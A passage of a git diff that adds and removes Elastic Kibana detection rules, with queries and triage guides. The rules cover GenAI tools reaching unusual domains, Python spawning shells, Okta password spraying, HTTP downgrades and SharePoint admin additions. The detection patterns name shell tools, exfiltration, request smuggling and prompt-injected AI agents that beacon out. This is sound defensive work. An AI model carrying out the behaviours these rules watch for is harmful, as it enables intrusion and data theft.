"id": "T1078.004", - "name": "Cloud Accounts", - "reference": "https://attack.mitre.org/techniques/T1078/004/" - } - ] - } - ] - }, - { - "framework": "MITRE ATT&CK", - "tactic": { - "id": "TA0004", - "name": "Privilege Escalation", - "reference": "https://attack.mitre.org/tactics/TA0004/" - }, - "technique": [ - { - "id": "T1548", - "name": "Abuse Elevation Control Mechanism", - "reference": "https://attack.mitre.org/techniques/T1548/" - } - ] - } - ], - "timestamp_override": "event.ingested", - "type": "esql", - "version": 2 - }, - "id": "8e7a4f2c-9b3d-4e5a-a1b6-c2d8f7e9b3a5_2", - "type": "security-rule" -} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/9050506c-df6d-4bdf-bc82-fcad0ef1e8c1_4.json b/packages/security_detection_engine/kibana/security_rule/9050506c-df6d-4bdf-bc82-fcad0ef1e8c1_4.json new file mode 100644 index 00000000000..e0edd4c5e8f --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/9050506c-df6d-4bdf-bc82-fcad0ef1e8c1_4.json @@ -0,0 +1,107 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Detects GenAI tools connecting to unusual domains on macOS. Adversaries may compromise GenAI tools through prompt injection, malicious MCP servers, or poisoned plugins to establish C2 channels or exfiltrate sensitive data to attacker-controlled infrastructure. AI agents with network access can be manipulated to beacon to external servers, download malicious payloads, or transmit harvested credentials and documents.", + "from": "now-9m", + "history_window_start": "now-7d", + "index": [ + "logs-endpoint.events.network*" + ], + "language": "kuery", + "license": "Elastic License v2", + "name": "GenAI Process Connection to Unusual Domain", + "new_terms_fields": [ + "destination.domain" + ], + "note": "## Triage and analysis\n\n### Investigating GenAI Process Connection to Unusual Domain\n\nGenAI tools with network access can be weaponized to contact attacker infrastructure for C2, data exfiltration, or payload retrieval. Compromised MCP servers, malicious plugins, or prompt injection attacks can redirect AI agents to connect to arbitrary domains. While legitimate GenAI tools connect to vendor APIs and CDNs, connections to unusual domains may indicate exploitation.\n\n### Possible investigation steps\n\n- Review the destination domain to determine if it's a legitimate GenAI service, CDN, package registry, or potentially malicious infrastructure.\n- Investigate the GenAI process command line and configuration to identify what triggered the connection (plugin, MCP server, user prompt).\n- Check if the domain was recently registered, uses a suspicious TLD, or has a low reputation score in threat intelligence feeds.\n- Review the timing and context of the connection to determine if it correlates with user activity or was automated.\n- Examine network traffic to and from the domain to identify the nature of the communication (API calls, file downloads, data exfiltration).\n- Check for other hosts in the environment connecting to the same domain to determine if this is an isolated incident.\n- Investigate whether the GenAI tool's configuration files were recently modified to add new MCP servers or plugins.\n- Correlate with file events to see if the GenAI tool downloaded or created files around the same time as the connection.\n\n### False positive analysis\n\n- GenAI tools may connect to new domains as vendors update their infrastructure, CDNs, or API endpoints.\n- Package managers (npm, pip) used by MCP servers may connect to package registries for dependency resolution.\n- Legitimate MCP servers and AI plugins connect to their respective backend services.\n- Developer workflows testing new AI integrations or MCP servers will naturally trigger alerts for novel domain connections.\n\n### Response and remediation\n\n- If the domain is confirmed malicious, block it at the network level and investigate the source of the compromise.\n- Review the GenAI tool's configuration for unauthorized MCP servers, plugins, or extensions that initiated the connection.\n- Investigate any data that may have been sent to the suspicious domain and assess the potential for data exfiltration.\n- Review and rotate any API keys, tokens, or credentials used by the GenAI tool.\n- Update detection rules to monitor the identified domain across all hosts in the environment.\n", + "query": "event.category:network and host.os.type:macos and event.action:connection_attempted and\n(\n process.name:(\n Claude or \"Claude Helper\" or \"Claude Helper (Plugin)\" or Copilot or Cursor or\n \"Cursor Helper\" or \"Cursor Helper (Plugin)\" or GPT4All or Jan or \"Jan Helper\" or\n KoboldCpp or \"LM Studio\" or Ollama or Windsurf or \"Windsurf Helper\" or\n \"Windsurf Helper (Plugin)\" or bunx or claude or codex or copilot or cursor or deno or\n gemini-cli or genaiscript or gpt4all or grok or jan or koboldcpp or llama-cli or\n llama-server or lmstudio or npx or ollama or pnpm or qwen or textgen or windsurf or yarn\n ) or\n (process.name:(node or node.exe) and process.command_line:(*openclaw* or *moltbot* or *clawdbot*))\n) and destination.domain:(* and not (\n aka.ms or anthropic.com or atlassian.com or cursor.com or cursor.sh or github.com or\n gpt4all.io or hf.co or huggingface.co or lmstudio.ai or localhost or ollama.ai or\n ollama.com or openai.com or *.aka.ms or *.akamaized.net or *.amazonaws.com or\n *.amplitude.com or *.anthropic.com or *.atlassian.com or *.aws.amazon.com or\n *.azure.com or *.cdn.cloudflare.net or *.cloudflare-dns.com or *.cloudflare.com or\n *.cloudflarestorage.com or *.codeium.com or *.cursor.com or *.cursor.sh or\n *.datadoghq.com or *.elastic-cloud.com or *.elastic.co or *.exp-tas.com or\n *.gemini.google.com or *.generativelanguage.googleapis.com or *.github.com or\n *.githubcopilot.com or *.githubusercontent.com or *.gitkraken.com or *.gitkraken.dev or\n *.google.com or *.googleapis.com or *.gpt4all.io or *.grok.x.ai or *.hf.co or\n *.honeycomb.io or *.huggingface.co or *.intercom.io or *.jan.ai or *.launchdarkly.com or\n *.lmstudio.ai or *.microsoft.com or *.mixpanel.com or *.msedge.net or *.npmjs.com or\n *.npmjs.org or *.ollama.ai or *.ollama.com or *.openai.com or *.pypi.org or\n *.r2.cloudflarestorage.com or *.segment.io or *.sentry.io or *.visualstudio.com or\n *.vsassets.io or *.vscode-cdn.net or *.windsurf.ai or *.x.ai or *.yarnpkg.com or\n *.cartocdn.com or *.chatgpt.com or *.claude.ai or *.claude.com or\n *.claudeusercontent.com or *.ggpht.com or *.gstatic.com or *.googleusercontent.com or\n *.launchpadcontent.net or *.pythonhosted.org or *.recaptcha.net or *.shields.io or\n *.snapcraftcontent.com or *.snapcraft.io or *.stripe.com or *.travis-ci.com or\n *.travis-ci.org or *.ubuntu.com or *.ytimg.com or\n *.github.io or *.githubassets.com or *.jsdelivr.net or *.nodesource.com or\n chatgpt.com or claude.ai or claude.com or flagcdn.com or gitlab.com or\n opencollective.com or pypi.org\n))\n", + "references": [ + "https://atlas.mitre.org/techniques/AML.T0086", + "https://glama.ai/blog/2025-11-11-the-lethal-trifecta-securing-model-context-protocol-against-data-flow-attacks", + "https://www.elastic.co/security-labs/elastic-advances-llm-security", + "https://specterops.io/blog/2025/11/21/an-evening-with-claude-code" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "destination.domain", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.category", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.command_line", + "type": "wildcard" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "9050506c-df6d-4bdf-bc82-fcad0ef1e8c1", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: macOS", + "Use Case: Threat Detection", + "Tactic: Command and Control", + "Data Source: Elastic Defend", + "Resources: Investigation Guide", + "Domain: LLM", + "Mitre Atlas: T0086" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0011", + "name": "Command and Control", + "reference": "https://attack.mitre.org/tactics/TA0011/" + }, + "technique": [ + { + "id": "T1071", + "name": "Application Layer Protocol", + "reference": "https://attack.mitre.org/techniques/T1071/", + "subtechnique": [ + { + "id": "T1071.001", + "name": "Web Protocols", + "reference": "https://attack.mitre.org/techniques/T1071/001/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "new_terms", + "version": 4 + }, + "id": "9050506c-df6d-4bdf-bc82-fcad0ef1e8c1_4", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/92a36c98-b24a-4bf7-aac7-1eac71fa39cf_1.json b/packages/security_detection_engine/kibana/security_rule/92a36c98-b24a-4bf7-aac7-1eac71fa39cf_1.json new file mode 100644 index 00000000000..4016546b32c --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/92a36c98-b24a-4bf7-aac7-1eac71fa39cf_1.json @@ -0,0 +1,116 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Detects the first time a Python process spawns a shell on a given host. Malicious Python scripts, compromised dependencies, or model file deserialization can result in shell spawns that would not occur during normal workflows. Since legitimate Python processes rarely shell out to interactive shells, a first occurrence of this behavior on a host is a strong signal of potential compromise.", + "from": "now-9m", + "history_window_start": "now-7d", + "index": [ + "logs-endpoint.events.process-*" + ], + "language": "kuery", + "license": "Elastic License v2", + "name": "First Time Python Spawned a Shell on Host", + "new_terms_fields": [ + "host.id", + "process.parent.executable" + ], + "note": "## Triage and analysis\n\n### Investigating First Time Python Spawned a Shell on Host\n\nAttackers who achieve Python code execution \u2014 whether through malicious scripts, compromised dependencies, or model file deserialization (e.g., pickle/PyTorch `__reduce__`) \u2014 often spawn shell processes to perform reconnaissance, credential theft, persistence, or reverse shell activity. Since legitimate Python workflows rarely shell out with `-c`, a first occurrence is highly suspicious.\n\nThis rule uses the New Terms rule type to detect the first occurrence of a Python process spawning a shell with the `-c` flag on a given host within a 7-day window. This approach reduces false positives from recurring legitimate Python workflows while surfacing novel, potentially malicious activity.\n\n### Possible investigation steps\n\n- Examine the parent Python process command line to identify the script or command that triggered the shell spawn.\n- Determine if the Python process was loading a model file (look for `torch.load`, `pickle.load`), running a standalone script, or executing via a compromised dependency.\n- Review the shell command arguments to assess intent (credential access, reverse shell, persistence, reconnaissance).\n- Inspect the full process tree to determine if the Python process was launched from an interactive session, a cron job, or an automated pipeline.\n- Investigate the origin of any recently downloaded scripts, packages, or model files on the host.\n- Correlate with other hosts in the environment to determine if the same behavior is occurring elsewhere, which may indicate a supply chain compromise.\n\n### False positive analysis\n\n- Development environments where Python scripts legitimately shell out for system tasks (e.g., build scripts, CI/CD runners) may trigger this rule on first occurrence. Consider excluding known CI/CD working directories or build automation paths.\n- Package installation via pip or conda may spawn shells during post-install scripts. These are excluded by the query filter.\n- Jupyter notebooks executing system commands via `!` or `subprocess` may trigger this rule in data science environments.\n\n### Response and remediation\n\n- Investigate the shell command that was executed and assess its impact (credential access, persistence, data exfiltration).\n- If a malicious file is confirmed, quarantine it and identify its source (PyPI, Hugging Face, shared drive, email attachment).\n- Scan other hosts that may have received the same file.\n- Review and rotate any credentials that may have been accessed.\n- Consider implementing `weights_only=True` enforcement for PyTorch model loading across the environment.\n", + "query": "event.category:process and host.os.type:macos and event.type:start and event.action:exec and\nprocess.parent.name:python* and\nprocess.name:(bash or dash or sh or tcsh or csh or zsh or ksh or fish) and process.args:\"-c\" and\nnot process.command_line:(*pip* or *conda* or *brew* or *jupyter*)\n", + "references": [ + "https://blog.trailofbits.com/2024/06/11/exploiting-ml-models-with-pickle-file-attacks-part-1/", + "https://github.com/trailofbits/fickling", + "https://5stars217.github.io/2024-03-04-what-enables-malicious-models/" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.category", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.command_line", + "type": "wildcard" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.name", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "92a36c98-b24a-4bf7-aac7-1eac71fa39cf", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: macOS", + "Use Case: Threat Detection", + "Tactic: Execution", + "Data Source: Elastic Defend", + "Resources: Investigation Guide", + "Domain: LLM" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0002", + "name": "Execution", + "reference": "https://attack.mitre.org/tactics/TA0002/" + }, + "technique": [ + { + "id": "T1059", + "name": "Command and Scripting Interpreter", + "reference": "https://attack.mitre.org/techniques/T1059/", + "subtechnique": [ + { + "id": "T1059.006", + "name": "Python", + "reference": "https://attack.mitre.org/techniques/T1059/006/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "new_terms", + "version": 1 + }, + "id": "92a36c98-b24a-4bf7-aac7-1eac71fa39cf_1", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/94e734c0-2cda-11ef-84e1-f661ea17fbce_207.json b/packages/security_detection_engine/kibana/security_rule/94e734c0-2cda-11ef-84e1-f661ea17fbce_207.json deleted file mode 100644 index df058ebf77b..00000000000 --- a/packages/security_detection_engine/kibana/security_rule/94e734c0-2cda-11ef-84e1-f661ea17fbce_207.json +++ /dev/null @@ -1,84 +0,0 @@ -{ - "attributes": { - "author": [ - "Elastic" - ], - "description": "Detects when a certain threshold of Okta user authentication events are reported for multiple users from the same client address. Adversaries may attempt to launch a credential stuffing or password spraying attack from the same device by using a list of known usernames and passwords to gain unauthorized access to user accounts.", - "false_positives": [ - "Users may share an endpoint related to work or personal use in which separate Okta accounts are used.", - "Shared systems such as Kiosks and conference room computers may be used by multiple users." - ], - "from": "now-9m", - "language": "esql", - "license": "Elastic License v2", - "name": "Multiple Okta User Authentication Events with Client Address", - "note": "## Triage and analysis\n\n### Investigating Multiple Okta User Authentication Events with Client Address\n\nThis rule detects when a certain threshold of Okta user authentication events are reported for multiple users from the same client address. Adversaries may attempt to launch a credential stuffing attack from the same device by using a list of known usernames and passwords to gain unauthorized access to user accounts. Note that Okta does not log unrecognized usernames supplied during authentication attempts, so this rule may not detect all credential stuffing attempts or may indicate a targeted attack.\n\n#### Possible investigation steps:\nSince this is an ESQL rule, the `okta.actor.alternate_id` and `okta.client.ip` values can be used to pivot into the raw authentication events related to this activity.\n- Identify the users involved in this action by examining the `okta.actor.id`, `okta.actor.type`, `okta.actor.alternate_id`, and `okta.actor.display_name` fields.\n- Determine the device client used for these actions by analyzing `okta.client.ip`, `okta.client.user_agent.raw_user_agent`, `okta.client.zone`, `okta.client.device`, and `okta.client.id` fields.\n- Review the `okta.security_context.is_proxy` field to determine if the device is a proxy.\n - If the device is a proxy, this may indicate that a user is using a proxy to access multiple accounts for password spraying.\n- With the list of `okta.actor.alternate_id` values, review `event.outcome` results to determine if the authentication was successful.\n - If the authentication was successful for any user, pivoting to `event.action` values for those users may provide additional context.\n- With Okta end users identified, review the `okta.debug_context.debug_data.dt_hash` field.\n - Historical analysis should indicate if this device token hash is commonly associated with the user.\n- Review the `okta.event_type` field to determine the type of authentication event that occurred.\n - If the event type is `user.authentication.sso`, the user may have legitimately started a session via a proxy for security or privacy reasons.\n - If the event type is `user.authentication.password`, the user may be using a proxy to access multiple accounts for password spraying.\n - If the event type is `user.session.start`, the source may have attempted to establish a session via the Okta authentication API.\n- Examine the `okta.outcome.result` field to determine if the authentication was successful.\n- Review the past activities of the actor(s) involved in this action by checking their previous actions.\n- Evaluate the actions that happened just before and after this event in the `okta.event_type` field to help understand the full context of the activity.\n - This may help determine the authentication and authorization actions that occurred between the user, Okta and application.\n\n### False positive analysis:\n- A user may have legitimately started a session via a proxy for security or privacy reasons.\n- Users may share an endpoint related to work or personal use in which separate Okta accounts are used.\n - Architecturally, this shared endpoint may leverage a proxy for security or privacy reasons.\n - Shared systems such as Kiosks and conference room computers may be used by multiple users.\n - Shared working spaces may have a single endpoint that is used by multiple users.\n\n### Response and remediation:\n- Review the profile of the users involved in this action to determine if proxy usage may be expected.\n- If the user is legitimate and the authentication behavior is not suspicious based on device analysis, no action is required.\n- If the user is legitimate but the authentication behavior is suspicious, consider resetting passwords for the users involves and enabling multi-factor authentication (MFA).\n - If MFA is already enabled, consider resetting MFA for the users.\n- If any of the users are not legitimate, consider deactivating the user's account.\n- Conduct a review of Okta policies and ensure they are in accordance with security best practices.\n- Check with internal IT teams to determine if the accounts involved recently had MFA reset at the request of the user.\n - If so, confirm with the user this was a legitimate request.\n - If so and this was not a legitimate request, consider deactivating the user's account temporarily.\n - Reset passwords and reset MFA for the user.\n- If this is a false positive, consider adding the `okta.debug_context.debug_data.dt_hash` field to the `exceptions` list in the rule.\n - This will prevent future occurrences of this event for this device from triggering the rule.\n - Alternatively adding `okta.client.ip` or a CIDR range to the `exceptions` list can prevent future occurrences of this event from triggering the rule.\n - This should be done with caution as it may prevent legitimate alerts from being generated.\n", - "query": "from logs-okta*\n| where\n event.dataset == \"okta.system\" and\n (event.action == \"user.session.start\" or event.action like \"user.authentication.*\") and\n okta.outcome.reason == \"INVALID_CREDENTIALS\"\n| keep\n okta.client.ip,\n okta.actor.alternate_id,\n okta.actor.id,\n event.action,\n okta.outcome.reason\n| stats\n Esql.okta_actor_id_count_distinct = count_distinct(okta.actor.id)\n by\n okta.client.ip,\n okta.actor.alternate_id\n| where\n Esql.okta_actor_id_count_distinct > 5\n| sort\n Esql.okta_actor_id_count_distinct desc\n", - "references": [ - "https://support.okta.com/help/s/article/How-does-the-Device-Token-work?language=en_US", - "https://developer.okta.com/docs/reference/api/event-types/", - "https://www.elastic.co/security-labs/testing-okta-visibility-and-detection-dorothy", - "https://sec.okta.com/articles/2023/08/cross-tenant-impersonation-prevention-and-detection", - "https://www.okta.com/resources/whitepaper-how-adaptive-mfa-can-help-in-mitigating-brute-force-attacks/", - "https://www.elastic.co/security-labs/monitoring-okta-threats-with-elastic-security", - "https://www.elastic.co/security-labs/starter-guide-to-understanding-okta" - ], - "related_integrations": [ - { - "package": "okta", - "version": "^3.0.0" - } - ], - "risk_score": 21, - "rule_id": "94e734c0-2cda-11ef-84e1-f661ea17fbce", - "setup": "The Okta Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", - "severity": "low", - "tags": [ - "Use Case: Identity and Access Audit", - "Data Source: Okta", - "Tactic: Credential Access", - "Resources: Investigation Guide" - ], - "threat": [ - { - "framework": "MITRE ATT&CK", - "tactic": { - "id": "TA0006", - "name": "Credential Access", - "reference": "https://attack.mitre.org/tactics/TA0006/" - }, - "technique": [ - { - "id": "T1110", - "name": "Brute Force", - "reference": "https://attack.mitre.org/techniques/T1110/", - "subtechnique": [ - { - "id": "T1110.003", - "name": "Password Spraying", - "reference": "https://attack.mitre.org/techniques/T1110/003/" - } - ] - }, - { - "id": "T1110", - "name": "Brute Force", - "reference": "https://attack.mitre.org/techniques/T1110/", - "subtechnique": [ - { - "id": "T1110.004", - "name": "Credential Stuffing", - "reference": "https://attack.mitre.org/techniques/T1110/004/" - } - ] - } - ] - } - ], - "timestamp_override": "event.ingested", - "type": "esql", - "version": 207 - }, - "id": "94e734c0-2cda-11ef-84e1-f661ea17fbce_207", - "type": "security-rule" -} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/9797d2c8-8ec9-48e6-a022-350cdfbf2d5e_2.json b/packages/security_detection_engine/kibana/security_rule/9797d2c8-8ec9-48e6-a022-350cdfbf2d5e_2.json new file mode 100644 index 00000000000..7aaa7d5f364 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/9797d2c8-8ec9-48e6-a022-350cdfbf2d5e_2.json @@ -0,0 +1,74 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Through the new_terms rule type, this rule detects potential HTTP downgrade attacks by identifying HTTP traffic that uses a different HTTP version than the one typically used in the environment. An HTTP downgrade attack occurs when an attacker forces a connection via an older HTTP version, resulting in potentially less secure communication. For example, an attacker might downgrade a connection from HTTP/2 to HTTP/1.1 or HTTP/1.0 to exploit known vulnerabilities or weaknesses in the older protocol versions.", + "from": "now-9m", + "history_window_start": "now-7d", + "index": [ + "logs-nginx.access-*", + "logs-apache.access-*", + "logs-apache_tomcat.access-*", + "logs-traefik.access-*" + ], + "language": "kuery", + "license": "Elastic License v2", + "name": "Potential HTTP Downgrade Attack", + "new_terms_fields": [ + "http.version", + "agent.id" + ], + "note": "## Triage and analysis\n\n> **Disclaimer**:\n> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. While every effort has been made to ensure its quality, we recommend validating the content and adapting it to suit your specific environment and operational needs.\n\n### Investigating Potential HTTP Downgrade Attack\n\nThis detection surfaces HTTP traffic negotiating a protocol version that deviates from your baseline, a sign of downgrade attempts that strip protections and enable evasion or exploit paths in older behaviors. An attacker deliberately breaks HTTP/2 negotiation so the server falls back to HTTP/1.1, then probes with crafted headers and chunked bodies to attempt request smuggling or cache bypass against web services.\n\n### Possible investigation steps\n\n- Correlate with TLS termination or load balancer logs to verify ALPN or Upgrade negotiation (server advertising h2) and whether the same client/IP previously used h2 with the same SNI/Host, distinguishing forced downgrade from capability mismatch.\n- Review the downgraded requests for exploitation indicators such as simultaneous Content-Length and Transfer-Encoding headers, duplicated or mixed-case headers, unusual methods (TRACE or PRI), or inconsistent chunked encoding suggesting smuggling attempts.\n- Examine surrounding response patterns for increased 400/421/426/431/505, backend 5xx, connection resets, or latency spikes that coincide with these requests and indicate error-driven fallback or probing.\n- Check for recent config changes or incidents on CDNs/WAFs/load balancers and web servers (e.g., http2 enablement, ALPN lists, h2/h2c settings) that could have disabled HTTP/2 and caused benign fallbacks.\n- Cluster events by source IP/User-Agent/ASN and targeted host to identify campaign activity across services and pivot the sources through threat intelligence or reputation feeds.\n\n### False positive analysis\n\n- Recent Nginx/Apache/Tomcat configuration changes that disable HTTP/2/h2c or alter TLS/ALPN on specific virtual hosts can legitimately force clients to fall back to HTTP/1.1, surfacing as a downgrade event in access logs.\n- Newly onboarded internal services or scripts that only support HTTP/1.0/1.1 and begin hitting an endpoint for the first time can introduce a first-seen older http.version relative to an HTTP/2 baseline without malicious intent.\n\n### Response and remediation\n\n- Immediately block or challenge source IPs/ASNs repeatedly forcing HTTP/1.1 to hosts that previously negotiated HTTP/2 via ALPN, and enable WAF rules to drop \u201cUpgrade: h2c\u201d attempts, requests with both Content-Length and Transfer-Encoding, or duplicated/mixed-case headers.\n- Remove downgrade paths by requiring TLS+ALPN \u201ch2\u201d on 443 (e.g., Nginx listen 443 ssl http2; Apache Protocols h2 http/1.1), disabling cleartext h2c and HTTP/1.0 on public endpoints, and ensuring intermediaries do not strip ALPN or rewrite headers.\n- Redeploy corrected configs and validate end-to-end HTTP/2 with curl --http2 and browser devtools, then confirm normal 2xx/3xx rates and elimination of 421/426/431/505 responses and backend 5xx spikes around previously downgraded traffic.\n- Escalate to Incident Response if downgraded requests show smuggling patterns (simultaneous Content-Length and Transfer-Encoding, mixed-case duplicates, TRACE/PRI methods), hit sensitive paths (/admin, /login, /actuator), or trigger cache anomalies like cross-user content.\n- Harden parsing and caching by normalizing headers at the edge, enforcing a single Content-Length, disabling TRACE, setting strict client_header_buffer_size and large_client_header_buffers, and configuring proxies/backends to reject conflicting CL/TE or ambiguous chunked bodies.\n", + "query": "http.version:*\n", + "required_fields": [ + { + "ecs": true, + "name": "http.version", + "type": "keyword" + } + ], + "risk_score": 21, + "rule_id": "9797d2c8-8ec9-48e6-a022-350cdfbf2d5e", + "severity": "low", + "tags": [ + "Domain: Web", + "Use Case: Threat Detection", + "Tactic: Defense Evasion", + "Data Source: Nginx", + "Data Source: Apache", + "Data Source: Apache Tomcat", + "Data Source: Traefik", + "Resources: Investigation Guide" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1562", + "name": "Impair Defenses", + "reference": "https://attack.mitre.org/techniques/T1562/", + "subtechnique": [ + { + "id": "T1562.010", + "name": "Downgrade Attack", + "reference": "https://attack.mitre.org/techniques/T1562/010/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "new_terms", + "version": 2 + }, + "id": "9797d2c8-8ec9-48e6-a022-350cdfbf2d5e_2", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/98ebd6a1-77db-4fe1-b4fd-1bd3c737b780_1.json b/packages/security_detection_engine/kibana/security_rule/98ebd6a1-77db-4fe1-b4fd-1bd3c737b780_1.json new file mode 100644 index 00000000000..6aadde28b45 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/98ebd6a1-77db-4fe1-b4fd-1bd3c737b780_1.json @@ -0,0 +1,126 @@ +{ + "attributes": { + "author": [ + "Elastic", + "Austin Songer" + ], + "description": "Identifies when a new SharePoint Site Administrator is added in Microsoft 365. Site Administrators have full control over SharePoint Sites, including the ability to manage permissions, access all content, and modify site settings. Adversaries who compromise a privileged account may add themselves or a controlled account as a Site Administrator to maintain persistent, high-privilege access to sensitive SharePoint data. This technique was notably observed in the 0mega ransomware campaign, where attackers elevated privileges to exfiltrate data and deploy ransom notes across SharePoint sites.", + "false_positives": [ + "Legitimate IT administrators adding Site admins as part of routine SharePoint site management.", + "Automated provisioning tools or scripts that assign Site admin roles during site creation workflows.", + "Organizational restructuring where site ownership is being transferred to new administrators." + ], + "from": "now-9m", + "index": [ + "filebeat-*", + "logs-o365.audit-*" + ], + "language": "kuery", + "license": "Elastic License v2", + "name": "M365 SharePoint Site Administrator Added", + "note": "## Triage and Analysis\n\n### Investigating M365 SharePoint Site Administrator Added\n\nSite Administrators in SharePoint Online have full control over a Site, including the ability to manage permissions, access all content, and configure site-level settings. Adversaries who gain access to a privileged account may assign Site Administrator rights to maintain persistent access or facilitate data exfiltration. The `SiteCollectionAdminAdded` audit event is logged when this privilege is granted.\n\n#### Possible Investigation Steps\n\n- Review the `user.id` field to determine who performed the action. Assess whether this user normally manages SharePoint site permissions.\n- Examine the `o365.audit.ModifiedProperties.SiteAdmin.NewValue` field to identify the account that was granted Site Administrator privileges.\n- Check the `o365.audit.SiteUrl` or `url.original` to determine which Site was targeted. Assess the sensitivity of the data stored in this site.\n- Review the `o365.audit.TargetUserOrGroupName` and `o365.audit.TargetUserOrGroupType` fields for additional context on the target principal.\n- Pivot to sign-in logs for the acting account to look for anomalies such as logins from unfamiliar locations, devices, or IP ranges.\n- Investigate whether the newly added admin account has performed subsequent actions such as file downloads, permission changes, or sharing link creation.\n- Check for other recent `SiteCollectionAdminAdded` events to determine if multiple Sites were targeted in a short time frame, which may indicate bulk privilege escalation.\n\n### False Positive Analysis\n\n- Routine SharePoint administration tasks by IT teams may trigger this alert. Correlate with change management tickets or scheduled maintenance windows.\n- Automated provisioning tools that assign Site admin roles during site creation or migration workflows may generate expected alerts.\n- Organizational changes such as team transitions or restructuring may involve legitimate Site admin reassignments.\n\n### Response and Remediation\n\n- If the admin addition is unauthorized, immediately remove the Site Administrator role from the suspicious account.\n- Reset credentials for both the account that performed the action and the account that was added, especially if compromise is suspected.\n- Review recent activity on the affected Site for signs of data exfiltration, permission changes, or content modifications.\n- Enable or verify enforcement of MFA for all accounts with SharePoint administrative privileges.\n- Audit the list of Site Administrators across all Sites to identify any other unauthorized additions.\n- Consider implementing Privileged Access Management (PAM) or Privileged Identity Management (PIM) to require just-in-time elevation for SharePoint admin roles.\n", + "query": "event.dataset:o365.audit\n and event.provider:(SharePoint or OneDrive)\n and event.category:web\n and event.action:SiteCollectionAdminAdded\n and event.outcome:success\n", + "references": [ + "https://learn.microsoft.com/en-us/purview/audit-log-activities#site-permissions-activities", + "https://www.obsidiansecurity.com/blog/saas-ransomware-observed-sharepoint-microsoft-365/" + ], + "related_integrations": [ + { + "package": "o365", + "version": "^3.0.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.category", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.dataset", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.outcome", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.provider", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "98ebd6a1-77db-4fe1-b4fd-1bd3c737b780", + "severity": "medium", + "tags": [ + "Domain: Cloud", + "Domain: SaaS", + "Domain: Identity", + "Data Source: Microsoft 365", + "Data Source: Microsoft 365 Audit Logs", + "Use Case: Identity and Access Audit", + "Tactic: Privilege Escalation", + "Tactic: Persistence", + "Resources: Investigation Guide" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0004", + "name": "Privilege Escalation", + "reference": "https://attack.mitre.org/tactics/TA0004/" + }, + "technique": [ + { + "id": "T1098", + "name": "Account Manipulation", + "reference": "https://attack.mitre.org/techniques/T1098/", + "subtechnique": [ + { + "id": "T1098.003", + "name": "Additional Cloud Roles", + "reference": "https://attack.mitre.org/techniques/T1098/003/" + } + ] + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0003", + "name": "Persistence", + "reference": "https://attack.mitre.org/tactics/TA0003/" + }, + "technique": [ + { + "id": "T1098", + "name": "Account Manipulation", + "reference": "https://attack.mitre.org/techniques/T1098/", + "subtechnique": [ + { + "id": "T1098.003", + "name": "Additional Cloud Roles", + "reference": "https://attack.mitre.org/techniques/T1098/003/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "query", + "version": 1 + }, + "id": "98ebd6a1-77db-4fe1-b4fd-1bd3c737b780_1", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/9aeca498-1e3d-4496-9e12-6ef40047eb23_1.json b/packages/security_detection_engine/kibana/security_rule/9aeca498-1e3d-4496-9e12-6ef40047eb23_1.json new file mode 100644 index 00000000000..28e328b47a0 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/9aeca498-1e3d-4496-9e12-6ef40047eb23_1.json @@ -0,0 +1,134 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Detects shell executions (cmd, PowerShell, rundll32) spawned by 